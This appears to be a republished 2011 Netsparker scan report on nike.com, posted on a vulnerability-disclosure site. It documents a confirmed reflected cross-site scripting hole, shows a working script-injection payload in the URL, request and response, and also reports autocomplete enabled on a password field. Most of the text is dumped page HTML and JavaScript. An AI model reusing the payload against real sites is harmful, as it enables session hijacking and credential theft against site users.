XSS, DORK, GHDB, www.nike.com REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Private Reporting of Security Research is preferred for Online Service Providers

Loading
Netsparker - Scan Report Summary
TARGET URL
 http://www.nike.com/nikeos/p/nike/en_US/?ref=
SCAN DATE
 4/18/2011 2:03:04 PM
REPORT DATE
 4/18/2011 2:18:43 PM
SCAN DURATION
 00:07:42

Total Requests

Average Speed

req/sec.
13
identified
4
confirmed
0
critical
7
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
8 %
LOW
38 %
INFORMATION
54 %
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /nikeos/p/nikegolf/en_US/

/nikeos/p/nikegolf/en_US/ CONFIRMED

http://www.nike.com/nikeos/p/nikegolf/en_US/?'"--></style></script><script>alert(0x0002D5)</script>

Parameters

Parameter Type Value
sitesrc GET USLP
Query Based QUERYSTRING '"--></style></script><script>alert(0x0002D5)</script>

Request

GET /nikeos/p/nikegolf/en_US/?'"--></style></script><script>netsparker(0x0002D5)</script> HTTP/1.1
Referer: http://www.nike.com/nikeos/p/nike/en_US/?ref=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html;charset=UTF-8
Content-Length: 30174
Cache-Control: public, must-revalidate, max-age=1800
Expires: Mon, 18 Apr 2011 19:43:07 GMT
Date: Mon, 18 Apr 2011 19:13:07 GMT
Connection: keep-alive


<!-- INCLUDING DATA SSI: "data_templates/generic_seo_data.html" -->
<!-- BEGIN SSI: "../../../global/templates/fragments/seo/seo.html" -->
<!-- END SSI: "../../../global/templates/fragments/seo/seo.html" --><!-- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" > <head> <script type="text/javascript" charset="utf-8"> var userAgent = navigator.userAgent.toLowerCase(); var isWebkit = userAgent.search('webkit'); if(isWebkit > 0){ if(userAgent.search('iphone') > 0 ||userAgent.search('ipod') > 0 || userAgent.search('ipad') > 0 || userAgent.search('android') > 0 ||userAgent.search('symbian') > 0){ var redirect_location = "/nikeos/p/nikegolf/en_US/mobile/?m=iphone&'"--></style></script><script>netsparker(0x0002D5)</script>="; console.log(redirect_location); window.location.replace(redirect_location); } else{ console.log('no redirect needed'); } } </script> <title>Golf Clubs, Balls, Apparel & Accessories | Nike Golf</title> <meta name="description" content="Nike Golf creates elite golfing clubs, equipment and apparel as well as supporting many of the premier athletes of the PGA Tour. Nike Golf continues to innovate to help athletes achieve their peak performances."> <meta name="keywords" content="nike golf, golf, nike golfing, golfing"> <meta name="name" content="content"> <link rel="shortcut icon" href="/nikegolf/global/resources/images/flags/us.png"> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta name="content-language" content="en"> <script type="text/javascript" charset="utf-8"> if (typeof(console)==undefined) console = {log:function(){}}; </script> <!-- BEGIN SSI: "../css/css.html" -->
<style type="text/css" media="screen"> *{ margin: 0; padding: 0; } a img, a { border:none; outline:none; } body{ font-family:helvetica, arial, sans-serif; background:url('/nikegolf/global/resources/images/backgrounds/body/MachspeedBlack_bg.jpg') top center no-repeat #1A1A1A fixed; } noscript{ color: white; } #grid{ background: url('/nikegolf/global/resources/images/grid.png'); text-align: center; } #wrapper{ text-align: left; width: 1022px; position: relative; margin:0 auto; } #frame{ width:940px; margin:0 0 0 81px; background: url('/nikegolf/global/resources/images/frame_shadow.png'); } #primary, #secondary, #footer{ width: 910px; margin-left: 15px; } #primary img{ /* margin-bottom: -10px;*/ } #primary{ background: #FFF; } #primary div, #secondary div{ float: left; } #HiddenMarquee { display: none; } #nav{ visibility: hidden; } #navigation{ position:absolute; top:24px; left: 0; width:96px; height:550px; } /* *** footer *** */ #footer{ clear: both; width: 890px; background: url(/nikegolf/global/resources/images/backgrounds/footer_bg.jpg) top center no-repeat #000; padding-left:20px; height:356px; overflow: hidden; } .copyrights{ width: 910px; background: #000; margin-left: 15px; } .copyrights div{ height: 40px; line-height: 40px; } .copyrights ul.left{ width: 440px; float: left; margin-left: 15px; } .copyrights ul.right{ width: 400px; float: right; } .copyrights ul li{ display: inline; font-size: 11px; color: #CCC; } .copyrights ul li a{ font-size: 11px; text-decoration: none; padding-right: 5px; color: #CCC; } .flag{ margin-right: 5px; } #footer .alpha, #footer .beta, #footer .gamma{ width:256px; padding:20px; float:left; display:block; position:relative; } #footer .beta{ width: 246px; margin-left: 5px; } #footer .beta p{ overflow: hidden; } #footer .gamma{ width: 263px; } #footer .gamma .col{ width: 131px; } #footer a, #footer p{ color:#7f7f7f; text-decoration:none; font-size:10px; display:block; margin: 0 0 1px 0; } #footer a:hover{ text-decoration:underline; } #footer h2{ height:50px; line-height:48px; font-size:18px; font-weight:normal; color:000; visibility:hidden; } #footer .foot_label{ height:50px; line-height:48px; font-weight:normal; color:000; visibility:hidden; } #footer h3{ font-size:12px; padding-bottom:12px; color:000; } #footer .foot_header{ font-size:12px; padding-bottom:12px; font-weight:bold; color:#000000; } .alpha .column { width:80px; float:left; margin-right:3px; } #footer .beta h3{ padding-bottom:2px; margin-bottom: 10px; } #footer .beta p{ line-height: 15px; } #footer .beta a{ color:#b93032; margin:0 0 10px 0; } #footer .beta p a{ display: inline; } #footer .beta a:hover{ color:#888888; } #footer .socialMedia{ position:absolute; top:35px; left:213px; width: 100px; } #footer .socialMedia a{ display:inline; } #footer form{ padding-top:8px; } #footer form input.text, #footer form #country{ float:left; height:16px; padding:4px 0 0 2px; width:120px; border:1px solid #b3b3b3; background-color:#fff; margin:0 1px 10px 0; font-size: 10px; line-height:24px !important; color:#888888; outline:none; } #footer form #country{ padding: 0; } #footer form #country option{ padding:4px 0 0 2px; } #footer form label{ display: block; float:left; height:19px; padding:4px 0 0 2px; width:120px; line-height: 12px !important; font-size: 11px; color: #888888; } #footer form .line_item{ width: 100%; margin: 0; line-height: 15px; } #dobDay, #dobMonth, #dobYear{ background-color:#FFFFFF; border:1px solid #B3B3B3; color:#888888; float: left; } #footer form .submit{ display:block; float:left; height:24px; width:80px; border:none; text-indent:-9999px; font-size:0; color:transparent; background: url(/nikegolf/global/resources/images/buttons/submit.gif) top left no-repeat transparent; cursor:pointer; } #footer #agreeTS { padding-top:2px; margin-top: 20px; } #footer #agreeTS a.termsOfService{ line-height:10px; float:right; width: auto !important; margin-right: 5px; font-size: 9px; } #footer #terms{ margin-top: 5px; float: right; display: block; width: 16px; height: 16px; border:1px solid #b3b3b3; } #demo { color:#fff; font-weight:bold; font-size:10px; position:relative; } #footer label{ font-size: 11px; display: block; } #footer .line_item{ display: block; clear: both; } #footer .col{ width: 128px; float: left; } /* #tl{ height:1px; width:4px; background-color:red; } #tr{ height:1px; width:4px; background-color:red; } #bl{ height:1px; width:4px; background-color:red; } #br{ height:1px; width:4px; background-color:red; } */ object{ display:block; } #messageBox1, #messageBox2{ background: #ce1e00; display: none; position: fixed; left: 0px; top: 0px; width: 100%; text-align: center; padding: 25px 0; color: #FFF; } #messageBox1 ul li, #messageBox2 ul li{ list-style: none; display: block; width: auto; color: white; font-size: 11px; float: none; } #messageBox1 ul li .error, #messageBox2 ul li .error{ display: block; width: auto; color: white; font-size: 11px; float: none; } .hide{ display: none !important; } .clear{ clear: both !important; float: none !important; font-size: 0 !important; width: 0; height: 0; } /* Minds Behind the Oven */ </style> <!--[if IE]> <style type="text/css"> #grid{ background: none; text-align: center; } #footer{ width: 910px; } #footer .alpha{ padding-left: 11px; width: 281px; margin-left: 10px; } #footer .beta{ width: 282px; } #footer .beta h2{ font-size: 0 !important; } #footer .gamma{ width:263px; padding: 0; margin-left: 23px; } #footer .gamma #sendForm{ margin-top: 15px; } #product-registration-form label#zipLabel{ width: 25px !important; } #product-registration-form input#zip{ width: 135px !important; } #footer form input.text, #footer form #country{ padding: none; line-height: 10px !important; } #messageBox1, #messageBox2{ _position:absolute; _top:expression(eval(document.body.scrollTop)); } select#dobDay, select#dobMonth, select#dobYear { font-size: 10px !important; } /*#emailForm .line_item{ background: yellow; } #emailForm .line_item .col{ background: red; } */ </style> <![endif]--> <style type="text/css"> body{ background-image: url(/nikegolf/global/resources/images/backgrounds/body/MachspeedBlack_bg.jpg); } </style> <!-- END SSI: "../css/css.html" -->
<!-- BEGIN SSI: "../../../global/templates/fragments/tracking.html" -->
<script type="text/javascript" charset="utf-8">// console.log("TRACKING.HTML") var track_site="USGF"; var track_page="homepage"; var page_tracker_obj= { pageName: track_site + '>' + track_page , prop18 : 'home' }; var site_data= { lang_locale:"en_US", country:"US", nav_current:"default", commerce_mode:"US", link_suffix:"", region:"US", platypus_region:"en_US", blog_locale:"en_US", tracking_region:"nam", tracking_report_region:"nam", video_region:"en_US", base_url: "http://www.nike.com", blog_base_url: "http://inside.nike.com", site_folder:"nikegolf" }; var trackingAccountArray = 'nikegolf,nikeall'.split(","); var tracker_obj= { server: trackingAccountArray[0], channel:'nikegolf', eVar4:'logged out', eVar8:site_data.tracking_region.toLowerCase()+'|'+site_data.country.toLowerCase()+'|'+site_data.lang_locale.toLowerCase(), eVar48:'D=pageName', prop2:'FLASH_VERSION', prop12:'nikegolf', prop13:site_data.tracking_report_region.toLowerCase(), prop14:site_data.country.toLowerCase(), prop15:site_data.lang_locale.toLowerCase(), prop21:'brand', prop22:'non-id', prop27:site_data.tracking_region.toLowerCase()+'|'+site_data.country.toLowerCase()+'|'+site_data.lang_locale.toLowerCase(), trackExternalLinks:true, linkInternalFilters:'javascript:,nike' }; tracker_obj['pageName'] = (!page_tracker_obj.pageName) ? track_site+'' : page_tracker_obj.pageName; tracker_obj['prop17'] = (!page_tracker_obj.prop17) ? "" : page_tracker_obj.prop17; tracker_obj['prop18'] = (!page_tracker_obj.prop18) ? "" : page_tracker_obj.prop18; tracker_obj['prop19'] = (!page_tracker_obj.prop19) ? "" : page_tracker_obj.prop19; tracker_obj['prop23'] = (!page_tracker_obj.prop23) ? "" : page_tracker_obj.prop23; tracker_obj['prop24'] = (!page_tracker_obj.prop24) ? "" : page_tracker_obj.prop24; var sitewide_tracker_obj= { account:'nikegolf,nikeall', currency:'USD', charset:'UTF-8' }; var nav_tracker_obj= { s_account:sitewide_tracker_obj.account, prefix:track_site+'>', setup: { pageURL:location.href, referrer:document.referrer }, persistent: { server: tracker_obj.server, channel: tracker_obj.channel, prop12: tracker_obj.prop12, prop13: tracker_obj.prop13, prop14: tracker_obj.prop14, prop15: tracker_obj.prop15, prop21: tracker_obj.prop21, prop22: tracker_obj.prop22, prop27: tracker_obj.prop27, prop50: tracker_obj.prop50 } }; var track_values = { footer_link: { prefix: track_site + '>footer' } }; var flash_tracker_obj = { s_account: sitewide_tracker_obj.account, prefix: tracker_obj.pageName+">", setup: { pageURL: location.href, referrer: document.referrer }, persistent: { server: tracker_obj.server, channel: tracker_obj.channel, prop12: tracker_obj.prop12, prop13: tracker_obj.prop13, prop14: tracker_obj.prop14, prop15: tracker_obj.prop15, prop17: tracker_obj.prop17, prop18: tracker_obj.prop18, prop19: tracker_obj.prop19, prop21: tracker_obj.prop21, prop22: tracker_obj.prop22, prop23: tracker_obj.prop23, prop24: tracker_obj.prop24, prop27: tracker_obj.prop27, prop50: tracker_obj.prop50, eVar4: "not logged in", eVar5: "D=g", eVar8: tracker_obj.prop13 + "|" + tracker_obj.prop14 + "|" + tracker_obj.prop15, eVar48: "D=pageName" } }; </script> <!-- END SSI: "../../../global/templates/fragments/tracking.html" -->
<!-- BEGIN SSI: "../fragments/includes.html" -->
<script src="/nikeos/global/js/jquery-1.2.6.min.js" type="text/javascript" charset="utf-8"></script>
<script src="/nikegolf/global/resources/js/jquery.validation.js" type="text/javascript" charset="utf-8"></script>
<script src="/nikegolf/global/resources/js/jquery.scrollTo-min.js" type="text/javascript" charset="utf-8"></script>
<script src="/nikegolf/global/resources/js/site.js" type="text/javascript" charset="utf-8"></script>
<script src="/nikegolf/en_US/resources/js/site.js" type="text/javascript" charset="utf-8"></script>
<script src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js" type="text/javascript" charset="utf-8"></script>
<script src="/nikeos/global/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
<script src="/nikeos/global/js/jsonmin.js" type="text/javascript" charset="utf-8"></script>
<script type="text/javascript">
if (!window.NIKEOS) var NIKEOS = {};
NIKEOS.siteHost = 'www.nike.com';
</script>

<!-- GLOBALLY REQUIRED -->
<script src="/nikeos/global/js/NIKEOS.global.js" type="text/javascript" charset="utf-8"></script>
<script src="/nikeos/global/js/plugins/jquery.cookie.js" type="text/javascript" charset="utf-8"></script>

<!-- TRACKING RELATED -->
<script src="/nikeos/global/js/ppk.browser.js" type="text/javascript" charset="utf-8"></script>
<script src="/nikeos/global/js/dalewarth.js" type="text/javascript" charset="utf-8"></script>

<script type="text/javascript" charset="utf-8">

// common_flashvar_names.js
var CONTENT_ID = "content_id"; var CONTENT_URL = "content_url"; var CONTENT_CLICKURL = "content_clickurl"; var CONTENT_TITLE = "content_title"; var CONTENT_DESCRIPTION = "content_description"; var CONTENT_PARAMS = "content_params"; var CONTENT_LOCALIZED_TEXT = "content_localized_text"; var CONTENT_TAGS = "content_tags"; var CONTENT_TYPE = "content_type"; var CONTENT_METADATA = "content_metadata"; var ATHLETE_ID = "athlete_id"; var PRODUCT_ID = "product_id"; var SITE_BASE_URL = "site_base_url"; var SERVICE_BASE_URL = "service_base_url"; var SERVICE_LOCALE_STRING = "service_locale_string"; var SITE_BASE_PATH = "site_base_path"; var CONTENT_BASE_PATH = "content_base_path"; var GLOBAL_BASE_PATH = "global_base_path"; var RESOURCES_BASE_PATH = "resource_base_path"; var GLOBAL_RESOURCES_BASE_PATH = "global_resources_base_path"; var FEED_PROXY_URL = "feed_proxy_url"; var SCENE7_BASE_URL = "scene7_base_url"; var HTML_DOC_TITLE = "html_doc_title"; var REGION = "platypus_region"; var COUNTRY = "country"; var LANG_LOCALE = "lang_locale"; var TIMESTAMP = "timestamp"; var LOCK_STAGEWIDTH = "lock_stagewidth"; var LOCK_STAGEHEIGHT = "lock_stageheight"; var MIN_STAGEWIDTH = "min_stagewidth"; var MAX_STAGEWIDTH = "max_stagewidth"; var MIN_STAGEHEIGHT = "min_stageheight"; var MAX_STAGEHEIGHT = "max_stageheight"; var DEBUG_MODE = "debug_mode"; var THEME_ID = "theme_id"; var EMBED_ATHLETE_SELECTOR = "embed_athlete_selector"; var FACET_XML = "facet_xml"; var GROUP_TITLE = "group_title"; var TWITTER_FEED = "twitter_feed"; var FACEBOOK_FEED = "facebook_feed"; var BLOG_FEED = "blog_feed"; var CONTENT_LIST = "content_list"; var TAG_LIST = "tag_list"; var HIDE_TOUTBAR = "hide_toutbar"; var TOUTBAR_ID = "toutbar_id"; var TOUTBAR_Y = "toutbar_y"; var CONTROLLER_STYLE = "controller_style"; var TITLE_LIST = "title_list"; var SUPPORTING_CONTENT_LIST = "supporting_content_list"; var EMBED_CONTENT = "embed_content"; var PAGINATION_POSITION = "pagination_position"; var ICON_URL = "icon_url"; var TITLE_URL = "title_url"; var EMBED_ATHLETE_SELECTOR = "embed_athlete_selector"; var INITIAL_TOUR_SELECTOR_TOUR = "initial_tour_selector_tour"; var TOUR_NAME_ORDER = "tour_name_order"; var LOCK_ATHLETE_SELECTOR_ACTIVE = "lock_athlete_selector_active"; var TITLEBAR_TITLE = "titlebar_title"; var DISABLE_FULLSCREEN = "fullscreen"; var DISABLE_ENABLEMENT = "disableEnablement"; var ENABLEMENT_POPTOTOP = "enablementPopToTop"; var AUTOPLAY = "autoPlay"; var ALWAYS_HIDE_CONTROLS = "alwaysHideControls"; var ENABLEMENT_XOFFSET = "enablementXOffset"; var ENABLEMENT_YOFFSET = "enablementYOffset"; var GUID = "guid"; var GROUP_TITLE = "group_title"; var MENS_CLICK_URL = "mens_click_url"; var WOMENS_CLICK_URL = "womens_click_url"; var KIDS_CLICK_URL = "kids_click_url"; var VIEW_ALL_CLICK_URL = "view_all_click_url"; var BG_URL = "bg_url"; var IMAGE_URL = "image_url"; var FEED_URL = "feed_url"; var FEED_CREDITS = "feed_credits"; var FEED_DISABLE_RSS = "feed_disable_rss"; var FEED_DISABLE_VIEW_ALL = "feed_disable_view_all"; var TRACKER_VARS = "tracker_vars"; var MODE = "mode";
var date = new Date();

var siteFolder = "nikegolf";
var siteRegion = "en_US";
var siteCountry = "US";

var video_site_config_xml = "http://www.nike.com/nikegolf/global/resources/xml/video/videoSiteConfig.xml";
var video_region_config_xml = "http://www.nike.com/nikeos/global/modules/video/v1/xml/reg/reg_config_en_US.xml";
var video_enable_fullscreen = "true";
var video_enablement = Boolean(true);

var resourcesBasePath = "/nikegolf/en_US/resources/";
var globalResourcesBasePath = "/nikegolf/global/resources/";
var contentBasePath = "/nikegolf/en_US/resources/content/";
var siteBasePath = "/nikeos/p/nikegolf/"+siteRegion+"/";
var siteHost = "http://www.nike.com";
var siteBase = "http://www.nike.com&q..
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /nikeos/p/nike/en_US/profile

/nikeos/p/nike/en_US/profile CONFIRMED

https://www.nike.com/nikeos/p/nike/en_US/profile?page=mynike

Identified Field Name

confirmPassword

Request

GET /nikeos/p/nike/en_US/profile?page=mynike HTTP/1.1
Referer: http://www.nike.com/nikeos/p/nike/en_US/?ref=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html;charset=UTF-8
Content-Length: 9886
Cache-Control: public, must-revalidate, max-age=1800
Expires: Mon, 18 Apr 2011 19:32:30 GMT
Date: Mon, 18 Apr 2011 19:02:30 GMT
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="shortcut icon" href="/global-landing/global/images/favicon.ico"/>
<link rel="image_src" href="/global-landing/global/images/swoosh.jpg" />
<!-- BEGIN SSI: "../fragments/jsincludes.html" -->
<script type="text/javascript" src="/nikeos/global/js/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/nikeos/global/js/swfobject.js"></script>
<script type="text/javascript" src="/nikeos/global/js/NIKEOS.global.js"></script>
<script type="text/javascript" src="/nikeos/global/js/jquery.cookie.js"></script>
<script type="text/javascript" src="/nikeos/global/js/dalewarth.js"></script>
<script type="text/javascript" src="/nikeos/global/js/jsonmin.js"></script>
<script type="text/javascript" src="/nikeos/global/js/ppk.browser.js"></script>
<script type="text/javascript" src="/global-landing/global/js/new_functions.js"></script>
<script type="text/javascript">
var base_url = 'http://www.nike.com'
</script>
<!--[if lt IE 7]>
<script type="text/javascript" src="/global-landing/global/js/DD_belatedPNG.js"></script>
<![endif]-->
<script type="text/javascript" src="/nikeos/global/js/jquery.curvycorners.min.js"></script>
<script type="text/javascript" src="/global-landing/global/js/topnav.js"></script><!-- END SSI: "../fragments/jsincludes.html" -->
<!-- BEGIN SSI: "../fragments/cssincludes.html" -->
<link rel="stylesheet" type="text/css" media="all" href="/global-landing/global/css/master.css" />
<link rel="stylesheet" type="text/css" media="all" href="/global-landing/global/css/new_global.css" />
<!--[if gte IE 6]><link rel="stylesheet" type="text/css" media="all" href="/global-landing/global/css/new_global_ie.css" /><![endif]-->
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" media="all" href="/global-landing/global/css/new_global_ie6.css" /><![endif]--><!-- END SSI: "../fragments/cssincludes.html" -->
<!-- BEGIN SSI: "../fragments/tracking.html" -->
<script type="text/javascript" charset="utf-8">
var track_site = "USLP";
// my attempt to do this using the new tracking xml layout - Skyle
(function($) {
// transform the prop nodes under the variables node to proper props...
function transform(arr) {
for (var i = 1; i < arr.length; i++) {
var obj = arr[i];
var vars = {};
if (obj.variables) {
vars = obj.variables;
delete obj.variables;
}
if (vars.prop) $.each(vars.prop.constructor == Array ? vars.prop : [vars.prop], function(i, prop) {
if (prop.num && prop.text) obj['prop' + prop.num] = prop.text;
});
}
return $.extend.apply($, arr);
}
// GLOBAL TRACKING OBJECTS
tracker_obj = transform([
{
prefix : "USLP",
prop2 : "FLASH_VERSION",
prop50 : "LOGGED_IN_ID",
eVar4 : "LOGGED_IN_STATUS",
trackExternalLinks : true,
linkInternalFilters : "javascript:,nike,rga"
},
{} ,
{ 'prefix' : "USLP" , 'courageSuite' : "nikebottledcourageus" , 'tagSuite' : "nikeuslanding" , 'server' : "nikeuslanding" , 'channel' : "nike.com" , 'variables' : { 'prop' : [ { 'text' : "home" , 'num' : "12" } , { 'text' : "us" , 'num' : "13" } , { 'text' : "us" , 'num' : "14" } , { 'text' : "en_US" , 'num' : "15" } , { 'text' : "us_landing" , 'num' : "17" } , { 'text' : "Landing Page" , 'num' : "21" } , { 'text' : "non-id" , 'num' : "22" } , { 'text' : "us|us|en_us" , 'num' : "27" } ] } }
]);
page_tracker_obj = transform([
{
pageName : ">profile" || "home"
},
{}
]);
// if the pageName is index, apply some defaults across regions
if (page_tracker_obj.pageName == 'index') {
page_tracker_obj.pageName = 'home';
page_tracker_obj.prop18 = 'gateway';
}
// place the prefix before the pageName
page_tracker_obj.pageName = tracker_obj.prefix + '>' + page_tracker_obj.pageName;
sitewide_tracker_obj = {
account : (tracker_obj.server || tracker_obj.tagSuite || "devrga") + ",nikeall",
currency : tracker_obj.currency || "USD",
charset : "UTF-8"
};
nav_tracker_obj = {
s_account : sitewide_tracker_obj.account,
prefix : tracker_obj.prefix,
setup : {
pageURL : location.href,
referrer : document.referrer
},
persistent : {
prop12 : tracker_obj.prop12,
prop13 : tracker_obj.prop13,
prop14 : tracker_obj.prop14,
prop15 : tracker_obj.prop15,
prop21 : tracker_obj.prop21,
prop22 : tracker_obj.prop22,
prop27 : tracker_obj.prop27,
prop50 : null,
server : location.hostname
}
};
track_site = tracker_obj.prefix;
})(jQuery);
</script>
<!-- END SSI: "../fragments/tracking.html" -->
<!-- BEGIN SSI: "../fragments/usefuljs.html" -->
<script type="text/javascript" charset="utf-8">
var ie6_mode=false;
var is_ie=false;
</script>
<!--[if IE]><script type="text/javascript" charset="utf-8">is_ie=true;</script><![endif]-->
<!--[if lte IE 6]><script type="text/javascript" charset="utf-8">ie6_mode=true;</script><![endif]-->
<script type="text/javascript" charset="utf-8">
var site_data=
{
country:"US",
nav_current:"home",
region:"US",
platypus_region:"en_US",
region_group:"en_US"
};
</script><!-- END SSI: "../fragments/usefuljs.html" -->
<!-- BEGIN SSI: "../../../na/en_US/fragments/custom_includes.html" -->
<link rel="stylesheet" href="/global-landing/na/en_US/css/region.css" type="text/css" media="screen" /><!-- END SSI: "../../../na/en_US/fragments/custom_includes.html" -->
<!-- BEGIN HEAD SSI: "profile.V2.html" -->
<script type="text/javascript" src="/nikeos/global/js/lib/firebugx.js"></script>
<script type="text/javascript" src="/nikeos/global/js/nikeos.js"></script>
<script type="text/javascript" src="/nikeos/global/js/webtoolkit.base64.js"></script>
<script type="text/javascript" src="/nikeos/global/js/minifield.js"></script>
<script type="text/javascript" src="/nikeos/global/js/jquery.dimensions.pack.js"></script>
<script type="text/javascript" src="/nikeos/global/js/jquery.cookie.js"></script>
<script type="text/javascript">
var JQ = jQuery.noConflict();
if (typeof(UPM) == 'object') {} else { var UPM = {}; }
UPM.locale = "en_US";
UPM.country = "US";
UPM.siteId = "1210";
</script>
<script type="text/javascript" charset="utf-8">
var locale = site_data.platypus_region;
var country = site_data.country;
//profile name: mynike
//profile track: >profile>pers_info
var page_tracker_obj=
{
pageName: track_site+">>profile>pers_info",
prop18: "profile"
};
</script>
<link rel="stylesheet" href="/nikeos/site/profile_v2.1/global/css/profile.css" type="text/css" media="screen, print" />
<!--[if IE]><link rel="stylesheet" href="/nikeos/site/profile_v2.1/global/css/profile_ie.css" type="text/css" media="screen, print" /><![endif]-->
<!--[if lt IE 7]><link rel="stylesheet" href="/nikeos/site/profile_v2.1/global/css/profile_ie6.css" type="text/css" media="screen, print" /><![endif]-->
<script type="text/javascript" src="/nikeos/global/js/jquery.profilePlugins.js"></script>
<script type="text/javascript" src="/nikeos/global/js/ui/ui.core.js"></script>
<script type="text/javascript" src="/nikeos/global/js/ui/ui.draggable.js"></script>
<script type="text/javascript" src="/nikeos/global/js/f4a_js.js"></script>
<script type="text/javascript" src="/nikeos/global/js/useful_prototypes.js"></script>
<script type="text/javascript" src="/nikeos/site/profile_v2.1/global/js/profile.js"></script>
<script type="text/javascript" src="/nikeos/site/profile_v2.1/global/js/upload_avatar.js"></script>
<script type="text/javascript">
var minifieldLocation = '/nikeos/global/swf/minifield/minifield.swf';
var prof = null;
var profileService = null;
var secondaryAddressesJSON = null;
var PROFILE_SERVICE_URL = "https://www.nike.com/services/profileService";
if (typeof(UPM) == 'object') {} else { var UPM = {}; }
UPM['UPLOAD_URL'] = PROFILE_SERVICE_URL.split('/services/profileService')[0]+"/usa/services/mediaupload/media_upload_service.jsp?action=upload";
UPM['CROP_URL'] = PROFILE_SERVICE_URL.split('/services/profileService')[0]+"/usa/services/mediaupload/media_upload_service.jsp?action=crop";
UPM['DELETE_URL'] = PROFILE_SERVICE_URL.split('/services/profileService')[0]+"/usa/services/mediaupload/media_upload_service.jsp?action=delete";
UPM['GET_PROFILE_IMAGE_URL'] = PROFILE_SERVICE_URL.split('/services/profileService')[0]+"/usa/services/mediaupload/media_upload_service.jsp?action=getprofileimage";
UPM['DEFAULT_IMAGE_URL'] = PROFILE_SERVICE_URL.split('/services/profileService')[0]+"/nikeos/site/profile_v2/global/images/profile_image/default_image.gif";
UPM['PROFILE_IMAGE_BASE_URL'] = "/vc/profile/";
UPM['TEMP_IMAGE_FOLDER_URL'] = PROFILE_SERVICE_URL.split('/services/profileService')[0]+"/";
var STATUS = "status";
var SUCCESS = "success";
var FAILURE = "failure";
var checkFields = ['email','firstName','lastName','firstNameKana','lastNameKana','screenName','mobileNumber'];
var isLoggedIn = false;
var editMode = false;
var clickTextSpan = '<span class="clickTextSpan">&raquo Click to Edit</span>';
var initialScreenName = false;
var initialMobileNumber = false;
var initialLastName = false;
var currentScreenName = false;
var currentMobileNumber = false;
var currentLastName = false;
var continueURL = JQ.getURLParam("continueURL") ? JQ.getURLParam("continueURL") : "http://store.nike.com/index.jsp?country=US&lang_locale=en_US";
var allFields = new Array();
var fieldData = { "basic_info_form": [
{ "id" : "screenName", "labelError" : "Name is already taken", "required" : "no" },
